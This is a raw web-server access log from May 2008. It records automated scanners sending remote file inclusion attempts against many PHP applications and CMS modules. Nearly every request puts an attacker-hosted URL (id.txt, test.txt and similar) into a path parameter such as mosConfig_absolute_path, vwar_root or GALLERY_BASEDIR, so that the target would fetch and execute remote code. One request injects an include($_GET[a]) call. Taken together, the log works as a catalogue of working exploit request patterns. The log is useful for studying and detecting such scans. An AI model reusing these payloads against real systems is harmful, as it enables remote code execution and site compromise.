64.34.164.89 - - [19/May/2008:11:16:59 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:11:17:01 -0700] "GET /logs/access_080112.log//skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:17:06 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:17:07 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:17:09 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:17:17 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:17:22 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:17:33 -0700] "GET //modules/xfsection/modify.php?dir_module=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:17:42 -0700] "GET /logs/access_080313.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:17:42 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:17:42 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:17:43 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:17:43 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:17:43 -0700] "GET /logs/access_080313.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:17:43 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:17:44 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:17:44 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:11:17:51 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:11:17:51 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:17:51 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:17:54 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:17:56 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.26.124 - - [19/May/2008:11:18:00 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:00 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:00 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:00 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:01 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:01 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:01 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:01 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:01 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [19/May/2008:11:18:05 -0700] "GET /logs/access_080113.log/content.php?seite=http://boxstr.com/files/2046601_dplxv/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [19/May/2008:11:18:05 -0700] "GET /content.php?seite=http://boxstr.com/files/2046601_dplxv/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [19/May/2008:11:18:06 -0700] "GET /logs/content.php?seite=http://boxstr.com/files/2046601_dplxv/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [19/May/2008:11:18:08 -0700] "GET /logs/access_071221.log/content.php?seite=http://boxstr.com/files/2046601_dplxv/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.26.124 - - [19/May/2008:11:18:08 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:10 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:10 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:10 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:10 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:10 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:10 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:11 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:11 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:11 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:13 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:13 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:18:13 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:18:15 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:18:16 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:18:16 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:18:19 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:18:19 -0700] "GET /convert/mvcw.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:18:20 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:18:23 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:18:24 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:18:24 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:18:38 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:18:38 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:11:18:40 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:11:18:40 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:18:41 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:18:42 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:18:42 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:18:43 -0700] "GET /logs/access_080312.log//modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:18:44 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:18:44 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:18:44 -0700] "GET /convert/mvcw.php?vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:18:44 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:18:44 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:18:47 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:11:19:10 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:11:19:11 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:11:19:11 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:19:20 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:19:20 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:19:20 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:19:22 -0700] "GET /logs/access_080215.log/convert/mvcw.php?step=1&vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:11:19:24 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:11:19:25 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:19:29 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:19:30 -0700] "GET /logs/access_080215.log/convert/mvcw.php?vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.62.35.166 - - [19/May/2008:11:19:40 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
211.62.35.166 - - [19/May/2008:11:19:40 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:11:19:44 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:11:19:44 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.62.35.164 - - [19/May/2008:11:19:45 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.62.35.164 - - [19/May/2008:11:19:45 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:19:48 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:19:51 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:19:52 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:19:52 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:19:59 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:20:00 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:20:01 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:20:01 -0700] "GET /logs/access_071224.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:20:01 -0700] "GET /logs/access_071224.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:20:15 -0700] "GET /logs/access_071224.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:20:30 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.229.242 - - [19/May/2008:11:20:36 -0700] "GET /logs/scanhttp://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/May/2008:11:20:36 -0700] "GET /scanhttp://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:20:54 -0700] "GET //saveserver.php?thisdir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.24.52.96 - - [19/May/2008:11:20:57 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.24.52.96 - - [19/May/2008:11:21:05 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:11:21:21 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.privatox.altervista.org/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:11:21:21 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.privatox.altervista.org/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:21:23 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:21:23 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:21:23 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:21:25 -0700] "GET /logs/access_071224.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.13.86.241 - - [19/May/2008:11:21:27 -0700] "GET //include.php?path[docroot]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
81.13.86.241 - - [19/May/2008:11:21:30 -0700] "GET /logs//include.php?path[docroot]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
216.188.60.54 - - [19/May/2008:11:21:41 -0700] "GET /index.php?incl=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.150 - - [19/May/2008:11:21:45 -0700] "GET /logs/access_071219.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
